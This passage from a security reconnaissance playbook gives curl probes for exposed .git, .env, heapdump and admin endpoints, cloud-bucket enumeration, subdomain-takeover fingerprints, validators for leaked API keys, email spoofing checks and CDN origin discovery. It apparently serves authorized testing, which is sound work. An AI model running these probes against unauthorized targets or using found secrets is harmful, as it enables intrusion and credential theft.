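        key, sep, value = line.partition(":")
        if not sep or key.strip().lower() != "disallow":
            continue
        value = value.strip()
        # Assumption: an empty value and a bare "/" carry no path information.
        if value and value != "/" and value not in paths:
            paths.append(value)
    return paths


robots = """User-agent: *
Disallow: /admin/
disallow: /internal-api/   # staging only
Disallow:
Disallow: /
Allow: /public
Disallow: /admin/
"""
print(disallow_paths(robots))
```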

16.6 SAML metadata — 5 paths

/saml/metadata
/FederationMetadata/2007-06/FederationMetadata.xml
/federationmetadata/2007-06/federationmetadata.xml
/simplesaml/saml2/idp/metadata.php
/auth/saml2/metadata

Reachable SAML metadata XML reveals: EntityID, signing certs (often pinned → cert-reuse pivot), SingleSignOnService URL, NameIDFormat. Mark as MISCONFIG (LOW severity unless metadata leaks internal hostnames or non-public certs, then MEDIUM).
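
A sketch of extracting those fields from a fetched metadata document with the standard library. It assumes the root element is a SAML 2.0 `EntityDescriptor`; `parse_saml_metadata` is a hypothetical name, and the sample document is made up. Note that `xml.etree.ElementTree` is not hardened against maliciously constructed XML, so treat untrusted responses with care.

```python
import xml.etree.ElementTree as ET

MD = "{urn:oasis:names:tc:SAML:2.0:metadata}"
DS = "{http://www.w3.org/2000/09/xmldsig#}"


def parse_saml_metadata(xml_text: str) -> dict:
    """Pull the recon-relevant fields out of an EntityDescriptor document."""
    root = ET.fromstring(xml_text)
    return {
        "entity_id": root.get("entityID"),
        "sso_urls": [el.get("Location") for el in root.iter(MD + "SingleSignOnService")],
        "name_id_formats": [(el.text or "").strip() for el in root.iter(MD + "NameIDFormat")],
        "cert_count": sum(1 for _ in root.iter(DS + "X509Certificate")),
    }


# Made-up sample document for illustration.
SAMPLE = (
    '<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" '
    'xmlns:ds="http://www.w3.org/2000/09/xmldsig#" '
    'entityID="https://idp.target.example/saml">'
    '<IDPSSODescriptor protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">'
    '<KeyDescriptor use="signing"><ds:KeyInfo><ds:X509Data>'
    '<ds:X509Certificate>MIIB</ds:X509Certificate>'
    '</ds:X509Data></ds:KeyInfo></KeyDescriptor>'
    '<NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress</NameIDFormat>'
    '<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" '
    'Location="https://idp.target.example/sso"/>'
    '</IDPSSODescriptor></EntityDescriptor>'
)
print(parse_saml_metadata(SAMPLE))
```

Hostnames in `entity_id` and `sso_urls` that are not in the known asset list are the signal that would raise the finding from LOW to MEDIUM.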

16.7 SSO subdomain prefixes — 8 prefixes

Probe each against root domain + every sibling brand domain:

auth.{domain}
login.{domain}
sso.{domain}
idp.{domain}
iam.{domain}
identity.{domain}
accounts.{domain}
oauth.{domain}

Plus probe /.well-known/openid-configuration on every alive subdomain (regardless of prefix).

16.8 Cloud bucket permutation arsenal

6 prefixes:

""           # bare candidate
backup-
assets-
static-
dev-
prod-

15 suffixes:

""           # bare candidate
-backup
-assets
-static
-media
-data
-uploads
-dev
-prod
-staging
-logs
-private
-public
-dump
-archive

47 generic stems (filter unless combined with target-identifying token):

www, mail, email, app, apps, web, webmail, ftp, cdn, static, assets, media, img, images,
videos, download, downloads, upload, uploads, data, files, docs, support, help, kb,
blog, news, dev, test, staging, stg, qa, uat, sandbox, preprod, preview, vpn,
mx, smtp, imap, pop, dns, ns, ns1, ns2, mx1, mx2

Provider URL templates:

S3:

https://{candidate}.s3.amazonaws.com/
https://{candidate}.s3.{region}.amazonaws.com/      # try us-east-1, us-west-2, eu-west-1, ap-southeast-1 first (legacy s3-{region} form only works in older regions)
https://s3.{region}.amazonaws.com/{candidate}/

GCS:

https://{candidate}.storage.googleapis.com/
https://storage.googleapis.com/{candidate}/

Azure Blob:

https://{candidate}.blob.core.windows.net/

Probe technique: HEAD first → 200/301 = exists, 403 = exists private, 404 = skip. On exists, GET root → if XML/JSON object listing returns, CRITICAL PUBLIC_CLOUD_BUCKET. Direct-URL object reads but not listable → HIGH PUBLIC_CLOUD_BUCKET_OBJECT_READ.
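
A sketch of candidate generation and status classification, with no network calls. The prefix and suffix lists are copied from above; treating every status other than 200/301/403 as "skip" is an assumption, and the function names are hypothetical.

```python
PREFIXES = ["", "backup-", "assets-", "static-", "dev-", "prod-"]
SUFFIXES = [
    "", "-backup", "-assets", "-static", "-media", "-data", "-uploads", "-dev",
    "-prod", "-staging", "-logs", "-private", "-public", "-dump", "-archive",
]


def bucket_candidates(token: str) -> list:
    """Every prefix x suffix combination around one target-identifying token."""
    token = token.lower()
    return [f"{prefix}{token}{suffix}" for prefix in PREFIXES for suffix in SUFFIXES]


def classify_head(status: int) -> str:
    """Map the HEAD status code to the probe outcome described above."""
    if status in (200, 301):
        return "exists"
    if status == 403:
        return "exists-private"
    return "skip"  # 404 per the text; other codes treated the same by assumption


candidates = bucket_candidates("acme")
print(len(candidates), candidates[:3])
```

Six prefixes times fifteen suffixes gives 90 candidates per token, so the token list is the main lever on request volume.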

16.9 JS guess-paths for endpoint discovery

Probe these paths on every alive webapp (in addition to scraped <script src=...>):

/main.js
/app.js
/bundle.js
/runtime.js
/index.js
/vendor.js
/_next/static/_buildManifest.js
/_next/static/_ssgManifest.js
/static/js/main.js
/static/js/bundle.js
/assets/index.js
/static/js/main.<hash>.js                 # try hash discovery via 404 patterns

For every found JS, also try <jsfile>.map for sourcemap leaks (HIGH INFO_DISCLOSURE).

16.10 Endpoint extraction regex tiers

Three tiers, run in order on every JS body + every sourcesContent[] blob:

Tier 1 — generic quoted paths:

['"`](/[A-Za-z0-9_\-./{}\[\]?=&%:]+)['"`]

Match group: the path. High recall, lots of false positives — apply allowlist downstream.

Tier 2 — API-ish paths (biased filter on tier 1):

['"`](/(?:api|graphql|gql|v\d+|swagger|openapi|rest|services|internal|admin|auth|oauth|user|users|account|accounts|search|export|upload|file|files|download|webhook|hooks|callback)/[A-Za-z0-9_\-./{}\[\]?=&%:]+)['"`]

Tier 3 — fully-qualified URLs:

\bhttps?://[A-Za-z0-9.\-]+\.[A-Za-z]{2,}(?::\d+)?[/A-Za-z0-9_\-./{}\[\]?=&%:#]*

Dedup on (method, normalized-path-template) where the template replaces /123/ with /{id}/ etc.
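
A sketch of tier 1 extraction followed by template normalization. JS string literals rarely carry the HTTP method, so this example dedups on the path template alone. Dropping the query string and replacing only all-digit segments are assumptions, and the function names are hypothetical.

```python
import re

# Tier 1 regex from above: any quoted string starting with "/".
TIER1 = re.compile(r"""['"`](/[A-Za-z0-9_\-./{}\[\]?=&%:]+)['"`]""")
NUMERIC_SEGMENT = re.compile(r"/\d+(?=/|$)")


def normalize(path: str) -> str:
    """Drop the query string and replace all-digit segments with {id}."""
    path = path.split("?", 1)[0]
    return NUMERIC_SEGMENT.sub("/{id}", path)


def extract_endpoints(js_body: str) -> list:
    """Unique, normalized path templates found in one JS body."""
    return sorted({normalize(match) for match in TIER1.findall(js_body)})


js = """
fetch("/api/v1/users/123/orders");
axios.get(`/api/v1/users/456/orders?limit=10`);
const css = '/static/app.css';
"""
print(extract_endpoints(js))
```

Both user-specific URLs collapse to one template, which is the point of deduplicating on the template rather than the raw string.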

16.11 Internal-host leakage regexes

Run on every JS body + sourcesContent + APK strings + manifest:

RFC1918 + loopback (127.0.0.0/8):

\b(?:10\.(?:\d{1,3}\.){2}\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3})\.(?:\d{1,3})|192\.168\.(?:\d{1,3})\.(?:\d{1,3})|127\.(?:\d{1,3}\.){2}\d{1,3})\b

Internal DNS suffixes:

\b[A-Za-z0-9][A-Za-z0-9\-]{0,62}\.(?:internal|corp|lan|intranet|local|prod|staging|dev|qa|test)\b

Kubernetes service DNS:

\b[A-Za-z0-9\-]+\.[A-Za-z0-9\-]+\.svc(?:\.cluster\.local)?\b

Each match → MEDIUM INFO_DISCLOSURE. Aggregate per host: if many matches share the same internal subdomain, that's a recon seed for any future internal phase.
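
A sketch of running the three regexes over one blob and counting hits, so repeated internal names stand out. The kind labels and `internal_leaks` are hypothetical; the patterns are the ones listed above.

```python
import re
from collections import Counter

PATTERNS = {
    "rfc1918": re.compile(
        r"\b(?:10\.(?:\d{1,3}\.){2}\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3})\.(?:\d{1,3})"
        r"|192\.168\.(?:\d{1,3})\.(?:\d{1,3})|127\.(?:\d{1,3}\.){2}\d{1,3})\b"
    ),
    "internal_dns": re.compile(
        r"\b[A-Za-z0-9][A-Za-z0-9\-]{0,62}\.(?:internal|corp|lan|intranet|local|prod|staging|dev|qa|test)\b"
    ),
    "k8s_svc": re.compile(r"\b[A-Za-z0-9\-]+\.[A-Za-z0-9\-]+\.svc(?:\.cluster\.local)?\b"),
}


def internal_leaks(blob: str) -> Counter:
    """Count (kind, value) hits across all three patterns."""
    hits = Counter()
    for kind, pattern in PATTERNS.items():
        for value in pattern.findall(blob):
            hits[(kind, value.lower())] += 1
    return hits


blob = (
    'const api = "http://10.20.30.40:8080"; const db = "billing-db.corp"; '
    'const upstream = "payments.prod-ns.svc.cluster.local"; retry("billing-db.corp");'
)
for (kind, value), count in sorted(internal_leaks(blob).items()):
    print(kind, value, count)
```

The DNS-suffix pattern is deliberately loose and will also fire on fragments of longer names (here, parts of the Kubernetes hostname), so review hits before turning each into a finding.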

16.12 Subdomain-takeover provider fingerprints (summary, 27 providers)

Watch for these CNAME targets + the corresponding "available for claim" response signature:

Provider | CNAME pattern | Takeover signature
GitHub Pages | *.github.io | There isn't a GitHub Pages site here.
Heroku | *.herokuapp.com | No such app
AWS S3 | *.s3*.amazonaws.com | NoSuchBucket
AWS CloudFront | *.cloudfront.net | Bad request w/ specific X-Amz error
Azure (multiple) | *.azurewebsites.net, *.blob.core.windows.net, *.cloudapp.net, *.trafficmanager.net | Various per-product 404 patterns
Shopify | shops.myshopify.com | Sorry, this shop is currently unavailable.
Squarespace | *.squarespace.com | No Such Account
Tumblr | *.tumblr.com | Whatever you were looking for doesn't currently exist.
WordPress | *.wordpress.com | Do you want to register *.wordpress.com?
Fastly | various | Fastly-specific 404
Pantheon | *.pantheonsite.io | The gods are wise, but do not know of the site...
Surge.sh | *.surge.sh | project not found
Bitbucket Pages | *.bitbucket.io | Repository not found
Tilda | *.tilda.ws | Please renew your subscription
Strikingly | *.s.strikinglydns.com | PAGE NOT FOUND
Smartling | *.smartling.com | Domain is not configured
Ngrok | *.ngrok.io | Tunnel not found
Webflow | *.webflow.io | Site not found
Zendesk | *.zendesk.com | Help Center Closed
Cargo | *.cargocollective.com | 404 Not Found (with cargo branding)
Statuspage | *.statuspage.io | Not found
Intercom | *.intercom.help | Not found
Helpjuice | *.helpjuice.com | Not found
Helpscout | *.helpscoutdocs.com | Not found
Tictail | *.tictail.com | Not found
Brightcove | *.brightcovegallery.com | Not found
Smugmug | various | Not found

For full per-provider detection signatures + edge cases, use SubdomainX or Subzy/Subjack against a freshly-fetched fingerprint database.
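
A sketch of the matching step for a few rows of the table, given an already-resolved CNAME target and an already-fetched response body. The fingerprint subset is illustrative and goes stale as providers change their error pages, so a hit is best treated as TENTATIVE until confirmed. `takeover_candidate` is a hypothetical name.

```python
from fnmatch import fnmatchcase

# (provider, CNAME glob, body signature): a subset of the table above.
FINGERPRINTS = [
    ("GitHub Pages", "*.github.io", "There isn't a GitHub Pages site here."),
    ("Heroku", "*.herokuapp.com", "No such app"),
    ("AWS S3", "*.s3*.amazonaws.com", "NoSuchBucket"),
    ("Surge.sh", "*.surge.sh", "project not found"),
]


def takeover_candidate(cname_target: str, body: str):
    """Return the provider name when both the CNAME glob and the signature match."""
    host = cname_target.rstrip(".").lower()
    body_lower = body.lower()
    for provider, pattern, signature in FINGERPRINTS:
        if fnmatchcase(host, pattern) and signature.lower() in body_lower:
            return provider
    return None


print(takeover_candidate("acme.github.io.", "<p>There isn't a GitHub Pages site here.</p>"))
```

Requiring both the CNAME pattern and the body signature avoids flagging healthy sites that merely sit on the same provider.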


16.13 Copy-Paste Probes (curl one-liners)

Every probe path in §16.1–16.12 with a runnable curl. Defaults: -sk (silent + ignore TLS errors), -m 10 (10s max), -o /tmp/r (response body to disk), -w '%{http_code}\n' (print status code), -A "Mozilla/5.0" (UA — change per persona).

Always-on HTTP checks (§16.5):

T="https://target.example"

# .git/config (CRITICAL)
curl -sk -m 10 "$T/.git/config" | grep -E '\[core\]|\[remote|repositoryformatversion'

# .git/HEAD (HIGH)
curl -sk -m 10 "$T/.git/HEAD" | grep -E '^ref:'

# .env (CRITICAL)
curl -sk -m 10 "$T/.env" | grep -E '^[[:space:]]*[A-Z_][A-Z0-9_]*[[:space:]]*='

# Apache /server-status (MEDIUM)
curl -sk -m 10 "$T/server-status" | grep -i 'Apache Server Status'

# Apache /server-info (MEDIUM)
curl -sk -m 10 "$T/server-info" | grep -i 'Apache Server Information'

# .DS_Store (LOW)
curl -sk -m 10 "$T/.DS_Store" -o /tmp/dsstore && head -c 8 /tmp/dsstore | xxd -p | grep -q '^0000000142756431' && echo ".DS_Store signature (Bud1) matched"

# phpinfo.php (HIGH)
curl -sk -m 10 "$T/phpinfo.php" | grep -E 'phpinfo\(\)|PHP Version'

# info.php (HIGH)
curl -sk -m 10 "$T/info.php" | grep -E 'phpinfo\(\)|PHP Version'

# Spring Boot /actuator/env (CRITICAL)
curl -sk -m 10 "$T/actuator/env" | grep -E '"propertySources"|systemProperties|systemEnvironment'

# Spring Boot /actuator/heapdump (CRITICAL — saves binary; check size)
curl -sk -m 30 "$T/actuator/heapdump" -o /tmp/heap && head -c 12 /tmp/heap | grep -a 'JAVA PROFILE' && ls -l /tmp/heap

# Elasticsearch open (HIGH)
curl -sk -m 10 "$T/_cat/indices?v"

# Jenkins script console (HIGH)
curl -sk -m 10 "$T/script" | grep -iE 'Jenkins|Script Console'

# Tomcat manager (HIGH)
curl -sk -m 10 -o /dev/null -w '%{http_code}\n' "$T/manager/html"     # 401 = present + auth-gated; 200 = no auth

# WordPress orphan installer (LOW)
curl -sk -m 10 "$T/wp-admin/install.php" | grep -i 'WordPress Installation'

# security.txt (INFO)
curl -sk -m 10 "$T/.well-known/security.txt"

SSO subdomain prefixes (§16.7):

D="target.example"
for prefix in auth login sso idp iam identity accounts oauth; do
  echo "=== ${prefix}.${D} ==="
  curl -sk -m 10 "https://${prefix}.${D}/.well-known/openid-configuration" -o /dev/null -w '%{http_code}\n'
done

# Generic OIDC discovery on any host:
HOST="login.target.example"
curl -sk -m 10 "https://${HOST}/.well-known/openid-configuration" | jq .

SAML metadata paths (§16.6):

H="target.example.com"
for p in /saml/metadata \
         /FederationMetadata/2007-06/FederationMetadata.xml \
         /federationmetadata/2007-06/federationmetadata.xml \
         /simplesaml/saml2/idp/metadata.php \
         /auth/saml2/metadata; do
  echo "=== $p ==="
  curl -sk -m 10 "https://${H}${p}" -o /dev/null -w '%{http_code} %{size_download}\n'
done

Cloud bucket probes (§16.8):

B="candidate-bucket-name"

# S3 (us-east-1 first)
curl -sk -m 10 -I "https://${B}.s3.amazonaws.com/" -w 'STATUS:%{http_code}\n' | head -20
# If 200/301: list objects
curl -sk -m 10 "https://${B}.s3.amazonaws.com/?list-type=2" | head -50

# S3 region-specific
for r in us-east-1 us-west-2 eu-west-1 ap-southeast-1; do
  curl -sk -m 10 -I "https://${B}.s3.${r}.amazonaws.com/" -w "${r}: %{http_code}\n"
done

# GCS
curl -sk -m 10 -I "https://${B}.storage.googleapis.com/"
curl -sk -m 10 "https://storage.googleapis.com/${B}/"

# Azure Blob
curl -sk -m 10 -I "https://${B}.blob.core.windows.net/"
curl -sk -m 10 "https://${B}.blob.core.windows.net/?comp=list"

GraphQL introspection POST (§16.2):

H="https://target.example/graphql"

curl -sk -m 15 -X POST "$H" \
  -H 'Content-Type: application/json' \
  -d '{
    "operationName":"IntrospectionQuery",
    "query":"query IntrospectionQuery { __schema { types { name kind fields { name type { name kind } } } queryType { name } mutationType { name } subscriptionType { name } } }"
  }' | jq '.data.__schema.types | length'

Read-only secret validators (§23):

# Postman PMAK
curl -sk -m 10 -H "X-Api-Key: PMAK-..." https://api.getpostman.com/me | jq .

# AWS (use boto3 instead of curl — pre-signing complexity)
python3 -c "import boto3; print(boto3.client('sts', aws_access_key_id='AKIA...', aws_secret_access_key='...').get_caller_identity())"

# GitHub PAT (note scope header)
curl -sk -m 10 -H "Authorization: token ghp_..." https://api.github.com/user -D /tmp/h | jq -r '.login,.email'
grep -i 'X-OAuth-Scopes' /tmp/h

# Slack
curl -sk -m 10 -H "Authorization: Bearer xoxb-..." -X POST https://slack.com/api/auth.test | jq .

# Anthropic (read-only validation)
curl -sk -m 10 -H "x-api-key: sk-ant-..." -H "anthropic-version: 2023-06-01" https://api.anthropic.com/v1/models | jq '.data | length'

# OpenAI
curl -sk -m 10 -H "Authorization: Bearer sk-..." https://api.openai.com/v1/models | jq '.data | length'

# npm
curl -sk -m 10 -H "Authorization: Bearer npm_..." https://registry.npmjs.org/-/whoami | jq .

# Atlassian (account)
curl -sk -m 10 -u "email:ATATT3xFfGF0_..." https://your-domain.atlassian.net/rest/api/3/myself | jq .

# DataDog (/validate checks the API key only; an application key is needed for most other endpoints)
curl -sk -m 10 -H "DD-API-KEY: ..." https://api.datadoghq.com/api/v1/validate | jq .

Bulk webapp triage (httpx, faster than curl loop):

# Install: go install github.com/projectdiscovery/httpx/cmd/httpx@latest
echo "target.example" | httpx -sc -title -tech-detect -web-server -ip -cdn -follow-redirects

# With probe list
cat subdomains.txt | httpx -sc -title -tech-detect -path /actuator/env,/.git/config,/.env -mc 200,301,403

Save responses for evidence:

T="https://target.example"
P="/actuator/env"
DIR="evidence/$(date -u +%Y%m%d)"     # computed once so a run that crosses midnight UTC stays in one directory
TS=$(date -u +%Y%m%dT%H%M%SZ)
SAFE_NAME=$(echo "${T}${P}" | tr '/:' '_')
mkdir -p "$DIR"
curl -sk -m 10 "$T$P" -o "${DIR}/${TS}_${SAFE_NAME}.body" \
  -D "${DIR}/${TS}_${SAFE_NAME}.headers"
sha256sum "${DIR}/${TS}_${SAFE_NAME}.body" "${DIR}/${TS}_${SAFE_NAME}.headers" > "${DIR}/${TS}_${SAFE_NAME}.sha256"

16.14 Email Security Analysis (SPF/DMARC/DKIM/BIMI/MTA-STS/DNSSEC)

Spoof feasibility + SaaS tenant inference from a target's email DNS.

SPF lookup + parsing:

D="target.example"
dig +short TXT "$D" | grep -i 'v=spf1'

Common SPF parsing checklist:

  • Ends in -all (hardfail) → strict; major providers reject spoofs.
  • Ends in ~all (softfail) → spam folder for spoofs.
  • Ends in ?all or no all → permissive; spoofs likely deliver.
  • Includes (include:) reveal SaaS tenants:
    • include:_spf.google.com → Google Workspace.
    • include:spf.protection.outlook.com → Microsoft 365.
    • include:_spf.salesforce.com → Salesforce.
    • include:mail.zendesk.com → Zendesk customer.
    • include:sendgrid.net → SendGrid customer.
    • include:mailgun.org → Mailgun customer.
    • include:_spf.atlassian.net → Atlassian Cloud.
    • include:amazonses.com → AWS SES.
    • include:mktomail.com → Marketo.
    • include:_spf.intuit.com → Intuit (QuickBooks/Mailchimp).
    • include:spf.mandrillapp.com → Mandrill.
    • include:_spf.workday.com → Workday.

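If evaluating the record needs more than 10 DNS-querying terms (include, a, mx, ptr, exists, redirect, counted across nested includes; RFC 7208 §4.6.4) → evaluation returns permerror → receivers handle that inconsistently, so spoofs may pass. Tools: spfquery, spftools (online), dig +trace.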
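
The checklist above can be sketched as a small parser. This is a minimal illustration, not a full SPF evaluator: analyze_spf and LOOKUP_TERMS are hypothetical names, and the lookup count covers only the top-level record (nested includes would have to be resolved and added).

```python
import re

# Terms that trigger a DNS query and count toward the RFC 7208 limit of 10.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}

def analyze_spf(record: str) -> dict:
    """Summarise one SPF TXT string (hypothetical helper, top-level terms only)."""
    includes, lookups, all_qualifier = [], 0, None
    for term in record.split()[1:]:              # skip the leading v=spf1
        qualifier = term[0] if term[0] in "+-~?" else "+"
        body = term.lstrip("+-~?").lower()
        name = re.split(r"[:=/]", body, maxsplit=1)[0]
        if name == "all":
            all_qualifier = qualifier
        elif name == "include" and ":" in body:
            includes.append(body.split(":", 1)[1])
        if name in LOOKUP_TERMS:
            lookups += 1
    # -all = hardfail, ~all = softfail, anything else (?all, +all, no all) = permissive
    posture = {"-": "hardfail", "~": "softfail"}.get(all_qualifier, "permissive")
    return {"posture": posture, "includes": includes, "top_level_lookups": lookups}

print(analyze_spf("v=spf1 include:_spf.google.com include:sendgrid.net mx ~all"))
```

Feed it the string returned by the dig command above; each entry in includes maps to a SaaS tenant via the list.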

DMARC policy + alignment:

dig +short TXT "_dmarc.${D}"

Parse for:

  • p= → primary policy (none, quarantine, reject).
  • sp= → subdomain policy (defaults to p=).
  • aspf= / adkim= → alignment mode (r=relaxed, s=strict).
  • pct= → percentage of mail to which policy applies.
  • rua= / ruf= → reporting addresses (often reveals SaaS DMARC vendors: dmarcian, valimail, Agari, easydmarc).

Severity:

  • p=none → spoof-feasible, downgrade trust → MEDIUM finding.
  • p=quarantine pct<100 → partial enforcement → LOW.
  • p=reject + aspf=s + adkim=s → well-postured → no finding.
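
A sketch of the tag parsing and the severity rubric above, assuming the DMARC TXT value has already been fetched. parse_dmarc and dmarc_severity are hypothetical helpers; combinations the rubric does not name are returned as REVIEW rather than guessed.

```python
def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=none; rua=...' into a lowercase-keyed tag dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags

def dmarc_severity(tags: dict) -> str:
    """Apply the three rubric lines; anything else needs a manual look."""
    policy = tags.get("p", "none").lower()
    pct = int(tags.get("pct", "100"))            # pct defaults to 100
    if policy == "none":
        return "MEDIUM"
    if policy == "quarantine" and pct < 100:
        return "LOW"
    if policy == "reject" and tags.get("aspf") == "s" and tags.get("adkim") == "s":
        return "NONE"
    return "REVIEW"

tags = parse_dmarc("v=DMARC1; p=quarantine; pct=50; rua=mailto:dmarc@target.example")
print(tags["p"], dmarc_severity(tags))
```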

DKIM key discovery:

DKIM selectors aren't well-known; common patterns:

for selector in default google selector1 selector2 mail email k1 dkim s1 s2 mta1 mta2 \
                amazonses 20240101 20230101 mailchimp sendgrid mxvault; do
  echo "=== ${selector} ==="
  dig +short TXT "${selector}._domainkey.${D}"
done

If a key returns: extract p=<base64> and check key length. RSA-1024 → MEDIUM (deprecated; should be 2048+). Missing or rotated infrequently → LOW finding.
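
Checking the key length by hand is error-prone, so here is a stdlib-only sketch. It assumes an RSA key (k=rsa or no k= tag) whose p= value is a base64 SubjectPublicKeyInfo; extract_p and dkim_rsa_bits are hypothetical helpers, and Ed25519 keys are out of scope.

```python
import base64

def extract_p(txt: str) -> str:
    """Pull the p= value out of a DKIM TXT answer, joining dig's quoted chunks."""
    joined = txt.replace('" "', "").replace('"', "")
    for part in joined.split(";"):
        key, _, value = part.strip().partition("=")
        if key.strip() == "p":
            return value.replace(" ", "")
    return ""

def _read_tlv(buf: bytes, pos: int):
    """Read one DER tag-length-value; return (tag, value, next_position)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                            # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def dkim_rsa_bits(p_value: str) -> int:
    """Return the RSA modulus size in bits; 0 for an empty (revoked) key."""
    der = base64.b64decode(p_value)
    if not der:
        return 0
    _, spki, _ = _read_tlv(der, 0)               # outer SEQUENCE
    _, _alg, nxt = _read_tlv(spki, 0)            # AlgorithmIdentifier
    _, bitstr, _ = _read_tlv(spki, nxt)          # BIT STRING wrapping the key
    _, rsakey, _ = _read_tlv(bitstr[1:], 0)      # skip the unused-bits byte
    _, modulus, _ = _read_tlv(rsakey, 0)         # INTEGER n
    return int.from_bytes(modulus, "big").bit_length()
```

Usage: dkim_rsa_bits(extract_p(answer)) where answer is one dig +short TXT line; a result of 1024 maps to the MEDIUM finding above.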

BIMI (Brand Indicators for Message Identification):

dig +short TXT "default._bimi.${D}"

If present + p=reject DMARC → brand-impersonation defense in inbox UI. Absence is LOW only (operational, not exploitable).

MTA-STS (Mail Transfer Agent Strict Transport Security):

dig +short TXT "_mta-sts.${D}"
curl -sk -m 10 "https://mta-sts.${D}/.well-known/mta-sts.txt"

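If neither responds → inbound SMTP TLS is opportunistic only, so an on-path attacker can strip STARTTLS or spoof MX answers. LOW finding. If the policy file says mode: enforce and its mx: entries match the live MX records → well-postured.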

TLS-RPT (TLS Reporting):

dig +short TXT "_smtp._tls.${D}"

DNSSEC validation:

dig +dnssec "${D}" SOA | grep -E 'flags|RRSIG'
delv "${D}" 2>&1 | grep -i 'fully validated\|insecur'

If delv returns "insecure" → DNSSEC not enabled (LOW finding; doesn't enable spoof but is hardening gap).

MX → IdP / mail-host inference:

dig +short MX "${D}"

MX pattern | IdP / hosting
aspmx.l.google.com, *.googlemail.com | Google Workspace
*.mail.protection.outlook.com | Microsoft 365
*.mail.eo.outlook.com | Microsoft 365 (older)
*.zoho.com | Zoho Mail
*.yandex.net | Yandex 360
*.fastmail.com | Fastmail
*.proofpoint.com, *.pphosted.com | Proofpoint (M365 user with Proofpoint inbound)
*.mimecast.com, *.mimecast-eu.com | Mimecast
*.barracudanetworks.com | Barracuda
Self-hosted IPs in target ASN | On-prem mail server (often Exchange)

DMARC reporting-vendor inference (parse rua= / ruf=):

RUA/RUF host | Vendor | Implication
*.dmarcian.com | dmarcian | DMARC reporting customer
*.valimail.com, *.dmarc-rua.com | Valimail | DMARC reporting customer
*.kdmarc.com | Kratikal kDMARC | Indian DMARC vendor; common in IN orgs
*.agari.com | Agari (Fortra) | Email security vendor
*.easydmarc.com | EasyDMARC | DMARC reporting customer
*.dmarcanalyzer.com | DMARC Analyzer | Reporting customer
*.postmarkapp.com | Postmark | DMARC reporting addon
<addr>@<target-domain> | Self-hosted reporting | Internal mailbox; sometimes leaks team-name (itg@, secops@, dmarc@)

Capture the vendor + the internal RUA mailbox. Both are leak surfaces (vendor compromise = DMARC bypass; internal mailbox = phishing target).
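
Both inferences reduce to suffix matching on hostnames. A minimal sketch follows, with only a few of the MX patterns from this section loaded; MX_PROVIDERS, classify_mx and rua_domains are hypothetical names, and the mapping should be extended from the tables before real use.

```python
# Subset of the MX patterns in this section, keyed by hostname suffix.
MX_PROVIDERS = {
    "google.com": "Google Workspace",
    "googlemail.com": "Google Workspace",
    "mail.protection.outlook.com": "Microsoft 365",
    "pphosted.com": "Proofpoint",
    "mimecast.com": "Mimecast",
}

def classify_mx(host: str) -> str:
    """Map one MX hostname to a provider by suffix; 'unknown' if nothing matches."""
    h = host.rstrip(".").lower()
    for suffix, provider in MX_PROVIDERS.items():
        if h == suffix or h.endswith("." + suffix):
            return provider
    return "unknown"

def rua_domains(rua_value: str) -> list:
    """Return the mailbox domains from a rua=/ruf= value (comma-separated mailto: URIs)."""
    domains = []
    for uri in rua_value.split(","):
        addr = uri.strip().split(":", 1)[-1].split("!")[0]   # drop mailto: and any !size suffix
        if "@" in addr:
            domains.append(addr.rsplit("@", 1)[1].lower())
    return domains

print(classify_mx("aspmx.l.google.com."))
print(rua_domains("mailto:r@rua.vendor.example, mailto:dmarc@target.example"))
```

A rua domain equal to the target domain is the self-hosted case; anything else is a vendor to look up in the reporting-vendor table.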

Windows / PowerShell parallel for the entire §16.14 audit:

PS 5.1 Resolve-DnsName does not accept -Type CAA (use PowerShell 7+ or nslookup -type=CAA <domain>). Otherwise:

$D = "target.example"
"=== SPF ==="; (Resolve-DnsName $D -Type TXT -EA SilentlyContinue | ? { $_.Strings -match 'v=spf1' }).Strings
"=== DMARC ==="; (Resolve-DnsName "_dmarc.$D" -Type TXT -EA SilentlyContinue).Strings
"=== MTA-STS ==="; (Resolve-DnsName "_mta-sts.$D" -Type TXT -EA SilentlyContinue).Strings
"=== TLS-RPT ==="; (Resolve-DnsName "_smtp._tls.$D" -Type TXT -EA SilentlyContinue).Strings
"=== BIMI ==="; (Resolve-DnsName "default._bimi.$D" -Type TXT -EA SilentlyContinue).Strings
"=== MX ==="; Resolve-DnsName $D -Type MX -EA SilentlyContinue | Select NameExchange,Preference
"=== DKIM common selectors ==="
foreach ($s in @("default","google","selector1","selector2","mail","email","k1","dkim","s1","s2","amazonses","mailchimp","sendgrid","mxvault","20240101","zoho","zmail","outlook","o365")) {
  $r = Resolve-DnsName "$s._domainkey.$D" -Type TXT -EA SilentlyContinue
  if ($r) { "${s}: FOUND" }
}
"=== CAA (PS 5.1 fallback) ==="; nslookup -type=CAA $D 2>$null

16.15 Origin Discovery / CDN Bypass

If the target is behind Cloudflare/Akamai/Fastly/CloudFront, the CDN's IP ranges are published or attributable by ASN. Any IP outside those ranges that serves the same site is an origin candidate.

Cloudflare IPv4 ranges:

https://www.cloudflare.com/ips-v4

Akamai ASNs: AS16625, AS20940, AS21342, AS21357. Fastly: AS54113. AWS CloudFront: published in https://ip-ranges.amazonaws.com/ip-ranges.json filter service:CLOUDFRONT.

Origin discovery via DNS history:

# SecurityTrails (paid)
curl -sk -H "APIKEY: ..." \
  "https://api.securitytrails.com/v1/history/${D}/dns/a" | jq '.records[] | {ip:.values[].ip, first_seen, last_seen}'

Free alternatives:

# Validin
curl -sk "https://app.validin.com/api/axon/${D}/dns" | jq .

# RiskIQ Community (free tier; auth required)
curl -sk -u "user:apikey" "https://api.riskiq.net/pt/v2/dns/passive?query=${D}" | jq .

Filter the result: any historical A record IP not in current CDN ranges = origin candidate.
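
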